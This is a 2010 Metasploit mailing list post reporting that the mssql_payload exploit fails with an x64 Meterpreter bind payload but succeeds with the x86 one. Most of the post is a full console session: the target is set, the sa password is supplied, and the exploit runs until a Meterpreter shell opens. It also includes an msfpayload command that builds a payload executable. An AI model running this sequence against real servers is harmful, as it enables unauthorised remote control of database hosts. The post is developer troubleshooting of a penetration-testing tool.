Metasploit mailing list archives

Issues with x64 based payloads

From: David Kennedy <kennedyd013 () gmail com>
Date: Sat, 19 Jun 2010 23:37:43 -0400

Anyone experiencing issues when using mssql_payload via a x64 based system?
It worked fine about two weeks ago however it appears something may have
changed. Example below tested on a server 2008 x64:

root@bt:/pentest/exploits/framework3# msfconsole

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 274 auxiliary
+ -- --=[ 209 payloads - 26 encoders - 8 nops
       =[ svn r9563 updated today (2010.06.19)

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set rhost 172.16.32.217
rhost => 172.16.32.217
msf exploit(mssql_payload) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf exploit(mssql_payload) > show options

Module options:

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD                       no        The password for the specified
username
   RHOST         172.16.32.217    yes       The target address
   RPORT         1433             yes       The target port
   USERNAME      sa               no        The username to authenticate as
   UseCmdStager  true             no        Wait for user input before
returning from exploit
   VERBOSE       false            no        Enable verbose output


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The listen port
   RHOST     172.16.32.217    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(mssql_payload) > set password P@55w0rd
password => P@55w0rd
expmsf exploit(mssql_payload) > exploit

[*] Started bind handler
[*] Command Stager progress -   2.80% done (1499/53629 bytes)
[*] Command Stager progress -   5.59% done (2998/53629 bytes)
[*] Command Stager progress -   8.39% done (4497/53629 bytes)
[*] Command Stager progress -  11.18% done (5996/53629 bytes)
[*] Command Stager progress -  13.98% done (7495/53629 bytes)
[*] Command Stager progress -  16.77% done (8994/53629 bytes)
[*] Command Stager progress -  19.57% done (10493/53629 bytes)
[*] Command Stager progress -  22.36% done (11992/53629 bytes)
[*] Command Stager progress -  25.16% done (13491/53629 bytes)
[*] Command Stager progress -  27.95% done (14990/53629 bytes)
[*] Command Stager progress -  30.75% done (16489/53629 bytes)
[*] Command Stager progress -  33.54% done (17988/53629 bytes)
[*] Command Stager progress -  36.34% done (19487/53629 bytes)
[*] Command Stager progress -  39.13% done (20986/53629 bytes)
[*] Command Stager progress -  41.93% done (22485/53629 bytes)
[*] Command Stager progress -  44.72% done (23984/53629 bytes)
[*] Command Stager progress -  47.52% done (25483/53629 bytes)
[*] Command Stager progress -  50.31% done (26982/53629 bytes)
[*] Command Stager progress -  53.11% done (28481/53629 bytes)
[*] Command Stager progress -  55.90% done (29980/53629 bytes)
[*] Command Stager progress -  58.70% done (31479/53629 bytes)
[*] Command Stager progress -  61.49% done (32978/53629 bytes)
[*] Command Stager progress -  64.29% done (34477/53629 bytes)
[*] Command Stager progress -  67.08% done (35976/53629 bytes)
[*] Command Stager progress -  69.88% done (37475/53629 bytes)
[*] Command Stager progress -  72.67% done (38974/53629 bytes)
[*] Command Stager progress -  75.47% done (40473/53629 bytes)
[*] Command Stager progress -  78.26% done (41972/53629 bytes)
[*] Command Stager progress -  81.06% done (43471/53629 bytes)
[*] Command Stager progress -  83.85% done (44970/53629 bytes)
[*] Command Stager progress -  86.65% done (46469/53629 bytes)
[*] Command Stager progress -  89.44% done (47968/53629 bytes)
[*] Command Stager progress -  92.24% done (49467/53629 bytes)
[*] Command Stager progress -  95.03% done (50966/53629 bytes)
[*] Command Stager progress -  97.73% done (52410/53629 bytes)
[*] Command Stager progress - 100.00% done (53629/53629 bytes)
[*] Exploit completed, but no session was created.

msf exploit(mssql_payload) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(mssql_payload) > exploit

[*] Started bind handler
[*] Command Stager progress -   2.80% done (1499/53629 bytes)
[*] Command Stager progress -   5.59% done (2998/53629 bytes)
[*] Command Stager progress -   8.39% done (4497/53629 bytes)
[*] Command Stager progress -  11.18% done (5996/53629 bytes)
[*] Command Stager progress -  13.98% done (7495/53629 bytes)
[*] Command Stager progress -  16.77% done (8994/53629 bytes)
[*] Command Stager progress -  19.57% done (10493/53629 bytes)
[*] Command Stager progress -  22.36% done (11992/53629 bytes)
[*] Command Stager progress -  25.16% done (13491/53629 bytes)
[*] Command Stager progress -  27.95% done (14990/53629 bytes)
[*] Command Stager progress -  30.75% done (16489/53629 bytes)
[*] Command Stager progress -  33.54% done (17988/53629 bytes)
[*] Command Stager progress -  36.34% done (19487/53629 bytes)
[*] Command Stager progress -  39.13% done (20986/53629 bytes)
[*] Command Stager progress -  41.93% done (22485/53629 bytes)
[*] Command Stager progress -  44.72% done (23984/53629 bytes)
[*] Command Stager progress -  47.52% done (25483/53629 bytes)
[*] Command Stager progress -  50.31% done (26982/53629 bytes)
[*] Command Stager progress -  53.11% done (28481/53629 bytes)
[*] Command Stager progress -  55.90% done (29980/53629 bytes)
[*] Command Stager progress -  58.70% done (31479/53629 bytes)
[*] Command Stager progress -  61.49% done (32978/53629 bytes)
[*] Command Stager progress -  64.29% done (34477/53629 bytes)
[*] Command Stager progress -  67.08% done (35976/53629 bytes)
[*] Command Stager progress -  69.88% done (37475/53629 bytes)
[*] Command Stager progress -  72.67% done (38974/53629 bytes)
[*] Command Stager progress -  75.47% done (40473/53629 bytes)
[*] Command Stager progress -  78.26% done (41972/53629 bytes)
[*] Command Stager progress -  81.06% done (43471/53629 bytes)
[*] Command Stager progress -  83.85% done (44970/53629 bytes)
[*] Command Stager progress -  86.65% done (46469/53629 bytes)
[*] Command Stager progress -  89.44% done (47968/53629 bytes)
[*] Command Stager progress -  92.24% done (49467/53629 bytes)
[*] Command Stager progress -  95.03% done (50966/53629 bytes)
[*] Command Stager progress -  97.73% done (52410/53629 bytes)
[*] Sending stage (748032 bytes) to 172.16.32.217
[*] Command Stager progress - 100.00% done (53629/53629 bytes)
[*] Meterpreter session 1 opened (172.16.32.129:52110 -> 172.16.32.217:4444)
at 2010-06-19 23:30:05 -0400

meterpreter >

Interesting enough if you just do a msfpayload
windows/x64/meterpreter/bind_tcp LPORT=443 X > moo.exe and copy it over to
the system it works.

Thanks!

Dave

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Issues with x64 based payloads David Kennedy (Jun 19)
- Re: Issues with x64 based payloads Joshua J. Drake (Jun 20)
  - Re: Issues with x64 based payloads David Kennedy (Jun 20)